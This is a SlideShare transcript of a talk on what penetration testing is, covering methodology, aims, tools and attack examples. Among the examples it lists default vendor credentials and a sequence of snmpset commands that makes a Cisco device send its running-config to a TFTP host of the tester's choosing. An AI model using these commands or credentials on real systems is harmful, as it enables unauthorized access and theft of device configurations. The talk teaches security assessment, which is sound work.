Your SlideShare is downloading. ×
0
Penetration testing What’s this? Dmitry Evteev  ( Positive  Technologies)
Penetration testing internals <ul><li>Penetration testing  !=  simulation of (un)real  attacker  activities </li></ul><ul>...
Methodology <ul><li>On the one hand,   the following best practices are used: </li></ul><ul><ul><li>Open Source Security T...
Abilities Protection mechanism   N … X Incident management Some activities were detected but not identified as an attack ....
Aims <ul><li>High-level </li></ul><ul><ul><li>Internal policy  ( pentest as an instrument of pressure ) </li></ul></ul><ul...
Approaches <ul><li>Perimeter pentest  ( with further attacks in internal network ) </li></ul><ul><ul><li>With or without a...
Real attack VS penetration testing <ul><li>For direct executor pentset is HACKING ! </li></ul><ul><li>Limitations </li></u...
Instruments <ul><li>Positive Technologies MaxPatrol </li></ul><ul><li>Nmap/dnsenum/dig … </li></ul><ul><li>… </li></ul><ul...
web application security problem <ul><ul><li>The most frequent web application vulnerabilities detected by “Black Box” met...
Pentest example: web applications <ul><li>What is web application pentest by BlackBox method? (real world) </li></ul>web s...
Weak password problem <ul><li>The recommended password policy is used </li></ul><ul><li>What is domain administrator passw...
Pentest example: Password bruteforce  ( defaults ) <ul><li>Well known </li></ul><ul><ul><li>admin:123456 </li></ul></ul><u...
Pentest example: Hello, Pavlik :) <ul><li>snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1 </...
The problem of access control <ul><li>Network access </li></ul><ul><ul><li>Network architecture  ( DMZ ,  technological ne...
The problem of access control <ul><li>Division of privileges among administrators </li></ul><ul><li>Users with extended pr...
Pentest example:   Use of vulnerabilities <ul><li>CANVAS && Metasploit </li></ul>
Pentest example: Privilege Extension in   Active Directory <ul><li>Version  1 : Password bruteforce </li></ul><ul><li>Vers...
Pentest example: Security analysis <ul><li>Network scanning </li></ul><ul><li>Password is bruteforced ! </li></ul><ul><ul>...
Pentest example: Security analysis
Pentest example:   Wireless networks
Pentest example:   Assessment of awareness program efficiency <ul><li>Send provocative messages via e-mail </li></ul><ul><...
Pentest example:   Example of a set of checks Note description Attack Monitored events A note from   authority   with atta...
Pentest example:   Assessment of awareness program effeciency Users that follow the link (only 1 pentest) Users that follo...
Conclusions <ul><li>Penetration testing </li></ul><ul><li>–  is a number of activities that allows to make efficient asses...
Thank you for your attention !  Any questions?  [email_address] http://devteev.blogspot.com/
Upcoming SlideShare
Loading in...5
×

Penetration testing, What’s this?

2,639

Published on

Published in: Technology
0 Comments
4 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
2,639
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
230
Comments
0
Likes
4
Embeds 0
No embeds

No notes for slide
  • Легенда: English alphabet characters in lower case, figures and special suymbols Other symbols
  • Transcript of "Penetration testing, What’s this?"

    1. 1. Penetration testing What’s this? Dmitry Evteev ( Positive Technologies)
    2. 2. Penetration testing internals <ul><li>Penetration testing != simulation of (un)real attacker activities </li></ul><ul><li>Penetration testing != instrumental scanning with manual vulnerability verification </li></ul><ul><li>Penetration testing – </li></ul><ul><ul><li>is a complex of activities aimed to estimate current security process status; </li></ul></ul><ul><ul><li>is a testing of protection bypassing; </li></ul></ul><ul><ul><li>is one of security audit methods. </li></ul></ul>
    3. 3. Methodology <ul><li>On the one hand, the following best practices are used: </li></ul><ul><ul><li>Open Source Security Testing Methodology Manual (OSSTMM) </li></ul></ul><ul><ul><li>Web Application Security Consortium (WASC) </li></ul></ul><ul><ul><li>Open Web Application Security Project (OWASP) </li></ul></ul><ul><ul><li>… </li></ul></ul><ul><li>On the other hand, the following standards are used: </li></ul><ul><ul><li>Center of Internet Security (CIS) guides </li></ul></ul><ul><ul><li>ISO 2700x series standards </li></ul></ul><ul><ul><li>… </li></ul></ul>
    4. 4. Abilities Protection mechanism N … X Incident management Some activities were detected but not identified as an attack . 2 Protection mechanism N … X
    5. 5. Aims <ul><li>High-level </li></ul><ul><ul><li>Internal policy ( pentest as an instrument of pressure ) </li></ul></ul><ul><ul><li>Estimation of current security processes </li></ul></ul><ul><ul><li>Should be done ( compliance ) </li></ul></ul><ul><li>Technological </li></ul><ul><ul><li>Get unauthorized access to internal network from the Internet </li></ul></ul><ul><ul><li>Gain maximum privileges in main infrastructure systems ( Active Directory, network hardware , DBMS , ERP, etc. ) </li></ul></ul><ul><ul><li>Get access to certain information resources </li></ul></ul><ul><ul><li>Get access to certain data ( information ) </li></ul></ul>
    6. 6. Approaches <ul><li>Perimeter pentest ( with further attacks in internal network ) </li></ul><ul><ul><li>With or without administrator awareness </li></ul></ul><ul><ul><li>Wireless network security analysis </li></ul></ul><ul><li>Internal pentest </li></ul><ul><ul><li>From average user working station </li></ul></ul><ul><ul><li>From chosen network segment </li></ul></ul><ul><li>Certain information system component testing ( security analysis ) </li></ul><ul><ul><li>Black, Grey and White Box </li></ul></ul><ul><li>Assessment of employee awareness in information security </li></ul>
    7. 7. Real attack VS penetration testing <ul><li>For direct executor pentset is HACKING ! </li></ul><ul><li>Limitations </li></ul><ul><ul><li>Compliance with Russian Federation legislation </li></ul></ul><ul><ul><li>Limited time </li></ul></ul><ul><ul><li>Minimum impact </li></ul></ul><ul><ul><li>No testing like DDoS </li></ul></ul><ul><li>Inconveniences </li></ul><ul><ul><li>Coordination of actions ( it can run into a very absurd extreme !) </li></ul></ul><ul><ul><li>Responsibility/Punctuality </li></ul></ul><ul><li>Advantages </li></ul><ul><ul><li>Do not need to hide the activities </li></ul></ul><ul><ul><li>Simplify the network perimeter identification process </li></ul></ul><ul><ul><li>A possibility to use Grey and White Box methods </li></ul></ul>
    8. 8. Instruments <ul><li>Positive Technologies MaxPatrol </li></ul><ul><li>Nmap/dnsenum/dig … </li></ul><ul><li>… </li></ul><ul><li>Immunity Canvas (VulnDisco, Agora Pack, Voip Pack) </li></ul><ul><li>Metasploit </li></ul><ul><li>… </li></ul><ul><li>THC Hydra/THC PPTP bruter/ncrack … </li></ul><ul><li>Cain and Abel/Wireshark </li></ul><ul><li>Aircrack </li></ul><ul><li>… </li></ul><ul><li>Yersinia </li></ul><ul><li>… </li></ul><ul><li>Browser , notepad … </li></ul>
    9. 9. web application security problem <ul><ul><li>The most frequent web application vulnerabilities detected by “Black Box” method ( 2009 statistics , http://ptsecurity.ru/analytics.asp ) </li></ul></ul>
    10. 10. Pentest example: web applications <ul><li>What is web application pentest by BlackBox method? (real world) </li></ul>web server auditor working station Check 1 Check N Vulnerability is detected <ul><li>Vulnerability 1: password bruteforce Impact: access to application ( with limited privileges ) </li></ul><ul><li>Vulnerability 2: SQL injection Impact: file reading only (magic quotes option is enabled ) </li></ul>Vulnerability is detected <ul><li>Vulnerability 3: path traversal Impact: file reading only ( potentially LFI) </li></ul><ul><li>Vulnerability 4: predictable identifier of loaded file Vulnerability 3 + Vulnerability 4 = Impact: commands execution on server </li></ul><ul><li>Next step – FURTHER ATTACK </li></ul>
    11. 11. Weak password problem <ul><li>The recommended password policy is used </li></ul><ul><li>What is domain administrator password? </li></ul>(coincide with login)
    12. 12. Pentest example: Password bruteforce ( defaults ) <ul><li>Well known </li></ul><ul><ul><li>admin:123456 </li></ul></ul><ul><ul><li>Administrator:P@ssw0rd </li></ul></ul><ul><ul><li>… </li></ul></ul><ul><li>SAP </li></ul><ul><ul><li>(DIAG) SAP*: 06071992, PASS </li></ul></ul><ul><ul><li>mandants : 000, 001, 066, all new </li></ul></ul><ul><ul><li>(RFC) SAPCPIC: ADMIN </li></ul></ul><ul><ul><li>mandants :000, 001, 066, all new </li></ul></ul><ul><ul><li>… </li></ul></ul><ul><li>Oracle </li></ul><ul><ul><li>sys:manager </li></ul></ul><ul><ul><li>sys:change_on_install </li></ul></ul><ul><ul><li>… </li></ul></ul><ul><li>Cisco </li></ul><ul><ul><li>Cisco:Cisco </li></ul></ul><ul><ul><li>… </li></ul></ul><ul><li>… </li></ul>
    13. 13. Pentest example: Hello, Pavlik :) <ul><li>snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1 </li></ul><ul><li>snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 integer 4 </li></ul><ul><li>snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 integer 1 </li></ul><ul><li>snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 address <tftp_host> </li></ul><ul><li>snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 string running-config </li></ul><ul><li>snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 1 </li></ul><ul><li>snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 6 </li></ul>
    14. 14. The problem of access control <ul><li>Network access </li></ul><ul><ul><li>Network architecture ( DMZ , technological network , user segment , testing environment ) </li></ul></ul><ul><ul><li>Remote network access </li></ul></ul><ul><li>Data access </li></ul><ul><ul><li>Shared resources ( password in clear text , data backup copy , different sensitive data ) </li></ul></ul><ul><ul><li>Web applications , DBMS , ERP </li></ul></ul>
    15. 15. The problem of access control <ul><li>Division of privileges among administrators </li></ul><ul><li>Users with extended privileges </li></ul><ul><li>Services (!) with more than required access level </li></ul><ul><li>General problem of identifiers management </li></ul>
    16. 16. Pentest example: Use of vulnerabilities <ul><li>CANVAS && Metasploit </li></ul>
    17. 17. Pentest example: Privilege Extension in Active Directory <ul><li>Version 1 : Password bruteforce </li></ul><ul><li>Version 2 : Vulnerabilities in controller domain services </li></ul><ul><li>Version 3 : Pass-the-hash attack </li></ul><ul><li>Version 4: Create new user from domain computer </li></ul><ul><li>Version 5 : Conduct attack « Poisoning ARP cash » ( for example , hijack RDP session, lower authentication level to LM ) </li></ul><ul><li>Version 6: NTLM Relay attack </li></ul><ul><li>Version 7: Find and restore system state domain ( for example , after successful attack on backup server ) </li></ul><ul><li>Version 8 : Get extended privileges owing to other systems ( for example , control items in company’s root DNS ) </li></ul><ul><li>Version 9 : Get extended privileges via other systems’ vulnerabilities ( passwords are stored with reversible encryption , insecure protocols are used, etc. ) </li></ul><ul><li>Version N … </li></ul>
    18. 18. Pentest example: Security analysis <ul><li>Network scanning </li></ul><ul><li>Password is bruteforced ! </li></ul><ul><ul><li>Exploitation of SQL Injection </li></ul></ul><ul><ul><li>Command execution on server </li></ul></ul><ul><ul><li>Privilege gaining </li></ul></ul><ul><ul><li>Internal resources attack </li></ul></ul><ul><ul><li>Internal pentest </li></ul></ul><ul><ul><li>Install MaxPatrol scanner </li></ul></ul><ul><ul><li>Find vulnerabilities </li></ul></ul><ul><ul><li>Exploit vulnerabilities </li></ul></ul><ul><ul><li>Move to network of the Head office </li></ul></ul><ul><ul><li>Conduct attacks on Head office resources </li></ul></ul><ul><ul><li>Get maximum privileges in the whole network ! </li></ul></ul>
    19. 19. Pentest example: Security analysis
    20. 20. Pentest example: Wireless networks
    21. 21. Pentest example: Assessment of awareness program efficiency <ul><li>Send provocative messages via e-mail </li></ul><ul><li>Send provocative messages via ICQ ( and other IM) </li></ul><ul><li>Distribute data media with provocative messages </li></ul><ul><li>Question employees </li></ul><ul><li>Talks ( by telephone , skype ) </li></ul>
    22. 22. Pentest example: Example of a set of checks Note description Attack Monitored events A note from authority with attached executable file . Spread of network worms . System infection with Trojan horse . Open the mailbox . Execute the attached file . A note from internal person with link to web site . The link points to an executable file . Fishing attacks . Spread of network worms . System infection with Trojan horse . Attacks through software vulnerabilities . Open the mailbox . Load file from w eb server . Execute the file . A note from authority with link to web site . Fishing attacks . Spread of network worms . System infection with Trojan horse . Attacks through software vulnerabilities . Open the mailbox . Follow the link .
    23. 23. Pentest example: Assessment of awareness program effeciency Users that follow the link (only 1 pentest) Users that follow the link (regular pentest)
    24. 24. Conclusions <ul><li>Penetration testing </li></ul><ul><li>– is a number of activities that allows to make efficient assessment of current security processes </li></ul><ul><li>Penetration testing </li></ul><ul><li>– is search and use of flows in security processes </li></ul><ul><ul><li>vulnerability management </li></ul></ul><ul><ul><li>configuration management </li></ul></ul><ul><ul><li>incident management </li></ul></ul><ul><ul><li>security management of web applications, DBMS , ERP, wire and wireless networks, etc. </li></ul></ul><ul><ul><li>etc. </li></ul></ul>
    25. 25. Thank you for your attention ! Any questions? [email_address] http://devteev.blogspot.com/
    1. A particular slide catching your eye?

      Clipping is a handy way to collect important slides you want to go back to later.

    ×